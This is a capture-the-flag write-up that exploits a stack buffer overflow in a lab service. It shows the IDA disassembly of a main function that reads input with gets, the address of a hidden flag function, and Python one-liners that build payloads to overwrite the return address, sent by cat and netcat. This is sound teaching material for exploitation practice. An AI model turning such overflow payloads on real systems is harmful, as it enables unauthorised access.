A vulnerable service is running here:
nc whale.hacking-lab.com 5777
You have the binary of the service. Analyze it, find a vulnerability, and then exploit the server to get the flag!
What happens if you input a veeeeeeeeeery long string?
Based on the name of this challenge and the hint, this appears to be a stack overflow. I opened this up in IDA and saw the main function code:
    var_410= qword ptr -410h
    var_404= dword ptr -404h
    s= byte ptr -400h

    push    rbp
    mov     rbp, rsp
    sub     rsp, 410h
    mov     [rbp+var_404], edi
    mov     [rbp+var_410], rsi
    lea     rdi, s                  ; "Input, please! >>----------> "
    call    _puts
    mov     rax, cs:__bss_start
    mov     rdi, rax                ; stream
    call    _fflush
    lea     rax, [rbp+s]
    mov     rdi, rax
    mov     eax, 0
    call    _gets
    lea     rax, [rbp+s]
    mov     rdi, rax                ; s
    call    _puts
    mov     eax, 0
    leave
    retn
    main endp
There is also a function called flag in the binary, which reads a file called flag.txt:
    push    rbp
    mov     rbp, rsp
    sub     rsp, 410h
    lea     rsi, modes              ; "r"
    lea     rdi, filename           ; "flag.txt"
    call    _fopen
So our goal is to get this function called. Locally I created a flag.txt and then started hacking on the assembly. The address for the flag function is 0x0000000000400676. Knowing that this is a 64-bit binary is important: the saved return address on the stack is 8 bytes wide, so the payload has to carry the full 8-byte address, written little-endian (least significant byte first).
Looking at the main assembly, I see that s is allocated 0x400 or 1024 bytes. Since s sits at rbp-400h, it is directly below the saved rbp and the return address. So I created a text file using a Python script and decided to try and completely smash the stack:
python -c "print '\x76\x06\x40\x00\x00\x00\x00\x00'*200" > payload.txt
I piped the output of my payload to the local binary and got the contents of my
cat payload.txt | ./stack
So then I tried it with netcat and got the result:
*Note: After talking with others on this solution, a more targeted Python script that overwrites only the return address would be:
python -c "print 'a'*1032 + '\x76\x06\x40\x00\x00\x00\x00\x00'" > payload.txt
The 1024 'a's fill s, the extra 8 bytes overwrite the saved rbp that sits just above it, and the 8-byte address that follows lands exactly on main's saved return address, so the retn at the end of main jumps into flag.